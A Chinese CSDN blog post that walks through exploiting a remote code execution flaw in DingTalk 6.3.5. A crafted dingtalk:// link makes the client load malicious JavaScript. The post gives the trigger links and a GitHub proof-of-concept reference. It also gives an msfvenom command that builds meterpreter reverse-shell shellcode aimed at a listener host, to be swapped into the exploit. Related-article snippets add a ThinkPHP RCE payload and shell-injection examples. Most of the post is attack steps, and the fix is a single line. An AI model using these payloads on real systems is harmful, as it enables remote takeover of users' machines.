钉钉6.3.5版本-RCE漏洞复现

最新推荐文章于 2023-02-13 15:40:39 发布
最新推荐文章于 2023-02-13 15:40:39 发布
阅读量5.8k 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_sweelg/article/details/123185581
版权

目录

漏洞描述

漏洞原理

漏洞复现

漏洞修复

漏洞描述

该漏洞可以导致6.3.5版本钉钉RCE,经过构造可直接上线。

 

漏洞原理

该漏洞让攻击者可以利用钉钉发送携带恶意JS脚本的HTML链接给受害者,受害者点击恶意链接时触发远程命令执行漏洞。

漏洞特征:

攻击者发送的链接格式固定:dingtalk   //开头

Pc_slide=true    //结尾

漏洞复现

GitHub地址:GitHub - crazy0x70/dingtalk-RCE

在本地准备好环境和test.html

 

任意窗口发送payload,然后点击连接,即可看到弹出计算器

dingtalk://dingtalkclient/page/link?url=http://127.0.0.1/test.html&pc_slide=true

尝试复现反弹shell

用msf生成shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43.227 LPORT=8848 -e x86/shikata_ga_nai -f csharp

替换poc中的var shellcode=new Uint8Array([])中的shellcode即可

msf开启监听

 

发送payload到任意窗口,点击即可反弹shell

dingtalk://dingtalkclient/page/link?url=http://127.0.0.1/shell.html&pc_slide=true

 

漏洞修复

更新至最新版本即可

参考连接:某钉RCE漏洞复现

Sweelg
关注
专栏目录
某钉版本6.3.5RCE漏洞复现
千寻的博客
03-31 463
漏洞名称 某钉钉版本6.3.5RCE 漏洞描述 具备获取查看web应用能力,且web站点通过http协议传输。 漏洞的利用就是通过HTTP协议进行访问构造的payload,从而达成远程RCE获取目标电脑权限 利用了Chromium v8引擎整数溢出漏洞(是V8优化编译器Turbofan在SimplifiedLowering阶段产生的一个整数溢出漏洞),V8是Chromium内核中的JavaScript引擎,负责对JavaScript代码进行解释优化与执行。 执行命令: dingtalk://dingta
漏洞复现钉钉rce反弹shell
qq_50854662的博客
01-05 1238
漏洞复现钉钉rce反弹shell
某钉漏洞复现
tlovejr的博客
03-01 574
一、漏洞描述 此次某钉的漏洞是具备获取查看web应用能力,通过我们构建的pyload也可知,某钉的漏洞利用就是通过HTTP协议进行访问进而构建的,从而达成远程RCE获取目标电脑权限 二、漏洞原理 利用了Chromium v8引擎整数溢出漏洞(是V8优化编译器Turbofan在SimplifiedLowering阶段产生的一个整数溢出漏洞),V8是Chromium内核中的JavaScript引擎,负责对JavaScript代码进行解释优化与执行。 三、影响版本 钉钉版本< 6.3.25 .
远程执行RCE漏洞,命令基础学习
goddemon
06-08 673
thinkpad 5.0 rce漏洞 payload与在get中写一句话木马的方法 执行payload //① /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 //② 写一句话木马 //①利用post写 ?s=index/think\app/invokefunction&function=call_user_func
msfvenom
jsd2root的博客
11-02 529
1.msfvenom的基本用法: Options:     -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: pa
钉钉云课堂sign计算方式
NET是世界上最好的语言
10-18 7883
sign=md5(url参数&ulcookie=ulcookie) 例如请求Url:https://saas.daxue.dingtalk.com/dingtalk/pack/v2/detail/assist.jhtml?packageId=363001 那么Header中使用的sign=md5(packageId=363001&ulcookie=ulcookie值) 示例:...
NSX 6.3.5 VMware-NSX-Manager-6.3.5-7119875.ova
07-29
由于文件太大,该下载附件内附的是百度云盘的下载地址 里面包含nsx 6.3.5的安装包和安装文档,一站式安装
dbeaver-ce-6.3.5-64-setup.rar
04-02
提供的安装文件是64位版本,名为“dbeaver-ce-6.3.5-x86_64-setup.exe”,这通常是一个Windows操作系统下的可执行安装程序。 DBeaver的主要功能包括但不限于: 1. **多数据库支持**:DBeaver的核心特性就是它能与...
mysql-workbench-community-6.3.5-win32.msi
11-05
mysql-workbench-community-6.3.5-win32.msi
mysql-workbench-community-6.3.5-win32.zip
05-01
“mysql-workbench-community-6.3.5-win32.msi”是安装程序文件,用于在Windows 32位系统上安装MySQL Workbench。在安装过程中,通常会询问关于安装路径、是否创建桌面快捷方式等选项。安装完成后,用户可以通过桌面...
版本钉钉(有一些漏洞可以利用)
08-03
有一些漏洞可以使用,我主要是下载一些直播视频
漏洞复现钉钉RCE反弹shell
weixin_46591320的博客
10-27 851
钉钉RCE漏洞复现
钉钉 RCE 漏洞
god_Zeo的安全博客
02-16 3324
钉钉 RCE 漏洞 影响版本 版本6.3.5 https://dtapp-pub.dingtalk.com/dingtalk-desktop/win_installer/Release/DingTalk_v6.3.5.11308701.exe 触发方式 dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true 成功复现 POC 参考https://github.com/crazy0x70/dingtal
RCE(远程代码执行漏洞)原理
彼岸花苏陌的博客
12-08 1381
RCE(远程代码执行漏洞)原理 一般在交换机或者路由器等等会设置一个ping的界面以便测试,如果防范不到会造成远程代码执行 一般使用ping会用到下面代码 $cmd = shell_exec( 'ping ' . $target ); 但是这个代码没有做任何处理,这样就会导致非预期输入例如: 输入:127.0.0.1|ipconfig 解释:|代表管道符,|的意思是只执行后面的程序 诸如此类的还有 || 前面为假则执行后面语句,否则只执行前面语句 & 无论前后是真是假都执行
初学RCE(远程命令/代码执行漏洞
热门推荐
qq_43814486的博客
05-09 5万+
RCE英文全称:remote command/code execute 漏洞出现的原因: 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。,这就是RCE漏洞...
钉钉监控代码
小生不才
06-12 2万+
import pymysql import time import requests ‘’’ kpi小姐姐接口 “https://oapi.dingtalk.com/robot/send?access_token=8daebe660297f090e6839b6a4454ff05382b59f3d515b3d7c14bc07f5fb642dd” ‘’’ class Moniter: def __in...
钉钉机器人发送消息代码详解
weixin_49253310的博客
02-19 6603
钉钉群机器人发送消息代码详解 自动化测试中利用钉钉实现自动化测试结果消息推送,实现线上监控 原理:利用钉钉群自定义机器人功能,封装消息,推送到钉钉中,每个机器人每分钟最多发送20条 步骤: 选择机器人或者自定义机器人,完成添加,获得钉钉Hook地址,复制地址 任意一个钉钉群–> 群设置–> 添加机器人–> 自定义机器人命名–> 添加成功–> 获得地址及token 地址格式:https://oapi.dingtalk.com/robot/send?access_token=xx
Spring Boot RCE到内存马探索
小王的储物间
02-13 1278
SpringBootVulExploit是Spring Boot漏洞Checklist,但在真正的环境中进行漏洞利用还是有一段距离的,因此衍生出了SpringBootExploit工具。本文是对该Checklist到内存马探索之路的记录。可能是大多数人没有需求,或者是安全研究员没有打红队的原因。导致利用方式普遍都是以弹计算器为最终结果,不能进一步深入利用,导致很多漏洞不了了之。目前网上普遍分析文章,复现文章都是以弹计算器结束,但这其实与实战化的需求还存在着很远的一段路程。
Struts2-057 两个版本RCE漏洞分析(含EXP)
mingyqf的博客
03-21 592
云影实验室 2018-08-27 10:15:02 485149 2 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 前言 2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。 该漏洞是由于在Struts2开发框架中使
devart securebridge 6.3.5 full source d7-dx10
最新发布
08-26
Devart SecureBridge 6.3.5是一个完整的网络安全组件库,适用于Delphi的D7至DX10版本。它提供了一套强大而且易于使用的功能,用于开发安全的网络应用程序。 Devart SecureBridge通过加密和身份验证保护网络通信,并提供了各种协议和组件,以确保数据的安全传输。它支持SSH、SFTP、FTP、SSL、TLS等协议,并提供了强大的加密算法和安全性功能,以保护数据的传输和存储。 SecureBridge还提供了各种组件和工具,用于管理和保护网络连接。它支持多个客户端和服务器同时连接,并提供了可靠的连接池和连接保持功能,以确保稳定的通信。 此外,SecureBridge还提供了丰富的事件和回调功能,用于处理各种网络事件和错误。它还提供了可定制的日志记录和错误处理选项,以便开发人员能够更好地监控和调试应用程序。 总的来说,Devart SecureBridge 6.3.5是一个功能强大而又易于使用的网络安全组件库,适用于Delphi的D7至DX10版本。它提供了全面的安全功能和工具,用于开发安全可靠的网络应用程序,并保护数据的传输和存储。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值